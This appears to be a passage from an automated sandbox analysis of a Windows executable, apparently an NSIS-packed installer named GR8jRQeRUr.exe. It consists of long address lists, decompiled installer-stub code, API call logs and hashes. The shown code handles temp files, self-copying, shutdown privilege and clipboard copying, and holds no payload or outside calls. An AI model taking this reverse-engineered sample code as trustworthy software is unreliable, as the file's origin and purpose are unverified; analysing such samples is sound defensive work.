                                                                                                                                                                          0x0040365a
                                                                                                                                                                          0x0040365c
                                                                                                                                                                          0x0040365c
                                                                                                                                                                          0x0040365a
                                                                                                                                                                          0x00403663
                                                                                                                                                                          0x0040366a
                                                                                                                                                                          0x00403670
                                                                                                                                                                          0x00403688
                                                                                                                                                                          0x00403698
                                                                                                                                                                          0x0040369d
                                                                                                                                                                          0x004036a3
                                                                                                                                                                          0x004036aa
                                                                                                                                                                          0x004036b1
                                                                                                                                                                          0x004036b3
                                                                                                                                                                          0x004036b4
                                                                                                                                                                          0x004036be
                                                                                                                                                                          0x004036c5
                                                                                                                                                                          0x004036c7
                                                                                                                                                                          0x004036c9
                                                                                                                                                                          0x004036c9
                                                                                                                                                                          0x004036dc
                                                                                                                                                                          0x004036de
                                                                                                                                                                          0x004037d8
                                                                                                                                                                          0x004037d8
                                                                                                                                                                          0x004037db
                                                                                                                                                                          0x004037de
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004036e8
                                                                                                                                                                          0x004036e9
                                                                                                                                                                          0x004036ec
                                                                                                                                                                          0x004036f5
                                                                                                                                                                          0x004036f5
                                                                                                                                                                          0x004036f8
                                                                                                                                                                          0x004036fb
                                                                                                                                                                          0x004036fe
                                                                                                                                                                          0x00403701
                                                                                                                                                                          0x00403701
                                                                                                                                                                          0x00403701
                                                                                                                                                                          0x00403702
                                                                                                                                                                          0x00403706
                                                                                                                                                                          0x004037c6
                                                                                                                                                                          0x004037cf
                                                                                                                                                                          0x004037d1
                                                                                                                                                                          0x004037d4
                                                                                                                                                                          0x004037d7
                                                                                                                                                                          0x004037d7
                                                                                                                                                                          0x004037d7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040370c
                                                                                                                                                                          0x0040370d
                                                                                                                                                                          0x0040370e
                                                                                                                                                                          0x00403712
                                                                                                                                                                          0x0040372c
                                                                                                                                                                          0x00403733
                                                                                                                                                                          0x00403746
                                                                                                                                                                          0x00403747
                                                                                                                                                                          0x0040375c
                                                                                                                                                                          0x00403761
                                                                                                                                                                          0x00403763
                                                                                                                                                                          0x00403765
                                                                                                                                                                          0x00403781
                                                                                                                                                                          0x00403788
                                                                                                                                                                          0x0040379b
                                                                                                                                                                          0x0040379c
                                                                                                                                                                          0x004037b1
                                                                                                                                                                          0x004037b7
                                                                                                                                                                          0x004037b9
                                                                                                                                                                          0x004037bb
                                                                                                                                                                          0x004037c3
                                                                                                                                                                          0x004037c5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004037c5
                                                                                                                                                                          0x004037bf
                                                                                                                                                                          0x004037c1
                                                                                                                                                                          0x004037e6
                                                                                                                                                                          0x004037ea
                                                                                                                                                                          0x004037f3
                                                                                                                                                                          0x004037f8
                                                                                                                                                                          0x004037fe
                                                                                                                                                                          0x00403809
                                                                                                                                                                          0x0040380b
                                                                                                                                                                          0x00403810
                                                                                                                                                                          0x00403812
                                                                                                                                                                          0x0040386a
                                                                                                                                                                          0x0040386f
                                                                                                                                                                          0x00403878
                                                                                                                                                                          0x0040387f
                                                                                                                                                                          0x00403882
                                                                                                                                                                          0x00403a59
                                                                                                                                                                          0x00403a59
                                                                                                                                                                          0x00403a5e
                                                                                                                                                                          0x00403a67
                                                                                                                                                                          0x00403a84
                                                                                                                                                                          0x00403afc
                                                                                                                                                                          0x00403afc
                                                                                                                                                                          0x00403b04
                                                                                                                                                                          0x00403b06
                                                                                                                                                                          0x00403b06
                                                                                                                                                                          0x00403b0c
                                                                                                                                                                          0x00403b0c
                                                                                                                                                                          0x00403a9b
                                                                                                                                                                          0x00403aa7
                                                                                                                                                                          0x00403ab8
                                                                                                                                                                          0x00403abf
                                                                                                                                                                          0x00403ac6
                                                                                                                                                                          0x00403ac6
                                                                                                                                                                          0x00403ace
                                                                                                                                                                          0x00403ada
                                                                                                                                                                          0x00403ae8
                                                                                                                                                                          0x00403af3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403adc
                                                                                                                                                                          0x00403adc
                                                                                                                                                                          0x00403add
                                                                                                                                                                          0x00403adf
                                                                                                                                                                          0x00403ae0
                                                                                                                                                                          0x00403ae1
                                                                                                                                                                          0x00403ae6
                                                                                                                                                                          0x00403af5
                                                                                                                                                                          0x00403af7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403af7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403ae6
                                                                                                                                                                          0x00403ada
                                                                                                                                                                          0x00403a71
                                                                                                                                                                          0x00403a78
                                                                                                                                                                          0x00403a78
                                                                                                                                                                          0x0040388e
                                                                                                                                                                          0x00403935
                                                                                                                                                                          0x00403935
                                                                                                                                                                          0x00403941
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403941
                                                                                                                                                                          0x0040389f
                                                                                                                                                                          0x004038a7
                                                                                                                                                                          0x004038f9
                                                                                                                                                                          0x004038f9
                                                                                                                                                                          0x004038ff
                                                                                                                                                                          0x00403906
                                                                                                                                                                          0x00403954
                                                                                                                                                                          0x00403956
                                                                                                                                                                          0x0040395b
                                                                                                                                                                          0x0040395d
                                                                                                                                                                          0x00403965
                                                                                                                                                                          0x00403965
                                                                                                                                                                          0x00403970
                                                                                                                                                                          0x0040397c
                                                                                                                                                                          0x00403982
                                                                                                                                                                          0x00403984
                                                                                                                                                                          0x00403a57
                                                                                                                                                                          0x00403a57
                                                                                                                                                                          0x00403a57
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040398a
                                                                                                                                                                          0x0040398a
                                                                                                                                                                          0x0040398c
                                                                                                                                                                          0x0040398d
                                                                                                                                                                          0x00403996
                                                                                                                                                                          0x0040398f
                                                                                                                                                                          0x0040398f
                                                                                                                                                                          0x0040398f
                                                                                                                                                                          0x0040399c
                                                                                                                                                                          0x004039a4
                                                                                                                                                                          0x004039ab
                                                                                                                                                                          0x004039b3
                                                                                                                                                                          0x004039b3
                                                                                                                                                                          0x004039c0
                                                                                                                                                                          0x004039cc
                                                                                                                                                                          0x004039d6
                                                                                                                                                                          0x004039d6
                                                                                                                                                                          0x004039d8
                                                                                                                                                                          0x004039df
                                                                                                                                                                          0x004039e9
                                                                                                                                                                          0x004039f5
                                                                                                                                                                          0x004039fb
                                                                                                                                                                          0x00403a01
                                                                                                                                                                          0x00403a04
                                                                                                                                                                          0x00403a0e
                                                                                                                                                                          0x00403a14
                                                                                                                                                                          0x00403a16
                                                                                                                                                                          0x00403a1a
                                                                                                                                                                          0x00403a2b
                                                                                                                                                                          0x00403a31
                                                                                                                                                                          0x00403a36
                                                                                                                                                                          0x00403a38
                                                                                                                                                                          0x00403a3b
                                                                                                                                                                          0x00403a41
                                                                                                                                                                          0x00403a41
                                                                                                                                                                          0x00403a38
                                                                                                                                                                          0x00403a16
                                                                                                                                                                          0x00403a44
                                                                                                                                                                          0x00403a4b
                                                                                                                                                                          0x00403a4b
                                                                                                                                                                          0x00403a4b
                                                                                                                                                                          0x00403a4b
                                                                                                                                                                          0x00403a52
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403a52
                                                                                                                                                                          0x00403984
                                                                                                                                                                          0x00403908
                                                                                                                                                                          0x0040390b
                                                                                                                                                                          0x0040390f
                                                                                                                                                                          0x00403914
                                                                                                                                                                          0x00403916
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403922
                                                                                                                                                                          0x0040392d
                                                                                                                                                                          0x00403932
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403932
                                                                                                                                                                          0x004038b0
                                                                                                                                                                          0x004038c8
                                                                                                                                                                          0x004038d9
                                                                                                                                                                          0x004038da
                                                                                                                                                                          0x004038de
                                                                                                                                                                          0x004038e0
                                                                                                                                                                          0x004038ee
                                                                                                                                                                          0x004038f5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004038f5
                                                                                                                                                                          0x004038f7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004038f7
                                                                                                                                                                          0x0040381a
                                                                                                                                                                          0x00403826
                                                                                                                                                                          0x0040382b
                                                                                                                                                                          0x00403830
                                                                                                                                                                          0x00403832
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040383a
                                                                                                                                                                          0x00403842
                                                                                                                                                                          0x00403853
                                                                                                                                                                          0x0040385b
                                                                                                                                                                          0x0040385d
                                                                                                                                                                          0x00403862
                                                                                                                                                                          0x00403864
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403864
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004037c1
                                                                                                                                                                          0x0040376a
                                                                                                                                                                          0x0040376c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040376e
                                                                                                                                                                          0x00403772
                                                                                                                                                                          0x00403776
                                                                                                                                                                          0x0040377d
                                                                                                                                                                          0x0040377d
                                                                                                                                                                          0x0040377d
                                                                                                                                                                          0x0040377d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040377d
                                                                                                                                                                          0x00403778
                                                                                                                                                                          0x0040377b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040377b
                                                                                                                                                                          0x00403714
                                                                                                                                                                          0x00403718
                                                                                                                                                                          0x0040371b
                                                                                                                                                                          0x00403722
                                                                                                                                                                          0x00403722
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403722
                                                                                                                                                                          0x0040371d
                                                                                                                                                                          0x00403720
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403720
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004036ee
                                                                                                                                                                          0x004036ee
                                                                                                                                                                          0x004036ef
                                                                                                                                                                          0x004036f0
                                                                                                                                                                          0x004036f0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004036ee
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                                                                          • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                                                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                                                                          • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\GR8jRQeRUr.exe" ,00000020,"C:\Users\user\Desktop\GR8jRQeRUr.exe" ,00000000), ref: 004036D6
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                                                                            • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\GR8jRQeRUr.exe" ,00000000,?), ref: 0040397C
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                                                                          • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\GR8jRQeRUr.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\GR8jRQeRUr.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\GR8jRQeRUr.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                          • API String ID: 3859024572-1809851306
                                                                                                                                                                          • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                                                                                                          • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                          • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004056DE, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                          			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x5bafc4
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                                                                                                                          0x004056e6
                                                                                                                                                                          0x004056ec
                                                                                                                                                                          0x004056f6
                                                                                                                                                                          0x004056f9
                                                                                                                                                                          0x0040588f
                                                                                                                                                                          0x004058ac
                                                                                                                                                                          0x004058b3
                                                                                                                                                                          0x004058b3
                                                                                                                                                                          0x004058c6
                                                                                                                                                                          0x004058e4
                                                                                                                                                                          0x004058e6
                                                                                                                                                                          0x004058ee
                                                                                                                                                                          0x00405944
                                                                                                                                                                          0x00405948
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040594a
                                                                                                                                                                          0x00405950
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040595a
                                                                                                                                                                          0x00405962
                                                                                                                                                                          0x00405965
                                                                                                                                                                          0x00405a67
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405a67
                                                                                                                                                                          0x00405974
                                                                                                                                                                          0x0040597f
                                                                                                                                                                          0x00405988
                                                                                                                                                                          0x00405993
                                                                                                                                                                          0x00405996
                                                                                                                                                                          0x0040599f
                                                                                                                                                                          0x004059a5
                                                                                                                                                                          0x004059a8
                                                                                                                                                                          0x004059a8
                                                                                                                                                                          0x004059c0
                                                                                                                                                                          0x004059c9
                                                                                                                                                                          0x004059cc
                                                                                                                                                                          0x004059d3
                                                                                                                                                                          0x004059da
                                                                                                                                                                          0x004059e2
                                                                                                                                                                          0x004059e2
                                                                                                                                                                          0x004059f9
                                                                                                                                                                          0x004059f9
                                                                                                                                                                          0x00405a00
                                                                                                                                                                          0x00405a06
                                                                                                                                                                          0x00405a12
                                                                                                                                                                          0x00405a19
                                                                                                                                                                          0x00405a22
                                                                                                                                                                          0x00405a24
                                                                                                                                                                          0x00405a27
                                                                                                                                                                          0x00405a36
                                                                                                                                                                          0x00405a39
                                                                                                                                                                          0x00405a3f
                                                                                                                                                                          0x00405a40
                                                                                                                                                                          0x00405a46
                                                                                                                                                                          0x00405a47
                                                                                                                                                                          0x00405a48
                                                                                                                                                                          0x00405a50
                                                                                                                                                                          0x00405a5b
                                                                                                                                                                          0x00405a61
                                                                                                                                                                          0x00405a61
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004059c0
                                                                                                                                                                          0x004058f6
                                                                                                                                                                          0x00405926
                                                                                                                                                                          0x0040592e
                                                                                                                                                                          0x00405930
                                                                                                                                                                          0x00405939
                                                                                                                                                                          0x00405939
                                                                                                                                                                          0x0040593f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040593f
                                                                                                                                                                          0x004058fa
                                                                                                                                                                          0x00405904
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004058c8
                                                                                                                                                                          0x004058ce
                                                                                                                                                                          0x00405909
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405912
                                                                                                                                                                          0x004058d7
                                                                                                                                                                          0x004058dc
                                                                                                                                                                          0x004058df
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004058df
                                                                                                                                                                          0x004058c6
                                                                                                                                                                          0x004056ff
                                                                                                                                                                          0x00405703
                                                                                                                                                                          0x0040570b
                                                                                                                                                                          0x0040570f
                                                                                                                                                                          0x00405712
                                                                                                                                                                          0x00405715
                                                                                                                                                                          0x00405718
                                                                                                                                                                          0x0040571b
                                                                                                                                                                          0x0040571c
                                                                                                                                                                          0x0040571d
                                                                                                                                                                          0x00405736
                                                                                                                                                                          0x00405739
                                                                                                                                                                          0x00405743
                                                                                                                                                                          0x00405752
                                                                                                                                                                          0x0040575a
                                                                                                                                                                          0x00405762
                                                                                                                                                                          0x00405767
                                                                                                                                                                          0x0040576a
                                                                                                                                                                          0x00405776
                                                                                                                                                                          0x0040577f
                                                                                                                                                                          0x00405788
                                                                                                                                                                          0x004057aa
                                                                                                                                                                          0x004057b0
                                                                                                                                                                          0x004057c1
                                                                                                                                                                          0x004057c6
                                                                                                                                                                          0x004057d4
                                                                                                                                                                          0x004057e2
                                                                                                                                                                          0x004057e2
                                                                                                                                                                          0x004057e7
                                                                                                                                                                          0x004057f5
                                                                                                                                                                          0x004057f5
                                                                                                                                                                          0x004057fa
                                                                                                                                                                          0x004057fd
                                                                                                                                                                          0x00405802
                                                                                                                                                                          0x0040580e
                                                                                                                                                                          0x00405817
                                                                                                                                                                          0x00405824
                                                                                                                                                                          0x00405833
                                                                                                                                                                          0x00405826
                                                                                                                                                                          0x0040582b
                                                                                                                                                                          0x0040582b
                                                                                                                                                                          0x0040583f
                                                                                                                                                                          0x0040583f
                                                                                                                                                                          0x00405853
                                                                                                                                                                          0x0040585c
                                                                                                                                                                          0x00405865
                                                                                                                                                                          0x00405875
                                                                                                                                                                          0x00405881
                                                                                                                                                                          0x00405881
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040573C
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040574B
                                                                                                                                                                          • GetClientRect.USER32 ref: 00405788
                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0040578F
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040584C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040575A
                                                                                                                                                                            • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040589E
                                                                                                                                                                          • CreateThread.KERNELBASE ref: 004058AC
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                          • AppendMenuW.USER32 ref: 0040597F
                                                                                                                                                                          • GetWindowRect.USER32 ref: 0040599F
                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 00405A1C
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                          • SetClipboardData.USER32 ref: 00405A5B
                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405A61
